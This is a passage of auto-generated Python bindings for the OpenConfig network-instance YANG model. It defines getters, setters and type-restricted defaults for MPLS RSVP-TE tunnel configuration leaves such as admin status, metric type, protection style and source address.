"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """admin_status must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:ADMIN_UP"), is_leaf=True, yang_name="admin-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__admin_status = t
if hasattr(self, "_set"):
self._set()
def _unset_admin_status(self):
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_preference(self):
"""
Getter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
return self.__preference
def _set_preference(self, v, load=False):
"""
Setter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_preference is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_preference() directly.
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """preference must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['1..255']}), is_leaf=True, yang_name="preference", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__preference = t
if hasattr(self, "_set"):
self._set()
def _unset_preference(self):
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with int32""",
"defined-type": "int32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['-2147483648..2147483647']}, int_size=32), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='int32', is_config=True)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
def _get_shortcut_eligible(self):
"""
Getter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
YANG Description: Whether this LSP is considered to be eligible for us as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
return self.__shortcut_eligible
def _set_shortcut_eligible(self, v, load=False):
"""
Setter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_shortcut_eligible is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shortcut_eligible() directly.
YANG Description: Whether this LSP is considered to be eligible for us as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shortcut_eligible must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("true"), is_leaf=True, yang_name="shortcut-eligible", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__shortcut_eligible = t
if hasattr(self, "_set"):
self._set()
def _unset_shortcut_eligible(self):
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_protection_style_requested(self):
"""
Getter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
YANG Description: style of mpls frr protection desired: can be
link, link-node or unprotected.
"""
return self.__protection_style_requested
def _set_protection_style_requested(self, v, load=False):
"""
Setter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_protection_style_requested is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_protection_style_requested() directly.
YANG Description: style of mpls frr protection desired: can be
link, link-node or unprotected.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """protection_style_requested must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:UNPROTECTED"), is_leaf=True, yang_name="protection-style-requested", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__protection_style_requested = t
if hasattr(self, "_set"):
self._set()
def _unset_protection_style_requested(self):
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_reoptimize_timer(self):
"""
Getter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
return self.__reoptimize_timer
def _set_reoptimize_timer(self, v, load=False):
"""
Setter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_reoptimize_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reoptimize_timer() directly.
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """reoptimize_timer must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__reoptimize_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_reoptimize_timer(self):
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_source(self):
"""
Getter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
YANG Description: RSVP-TE tunnel source address
"""
return self.__source
def _set_source(self, v, load=False):
"""
Setter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_source is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_source() directly.
YANG Description: RSVP-TE tunnel source address
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """source must be of a type compatible with inet:ip-address""",
"defined-type": "inet:ip-address",
"generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}),RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}),], is_leaf=True, yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address', is_config=True)""",
}
)
self.__source = t
if hasattr(self, "_set"):
self._set()
def _unset_source(self):
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
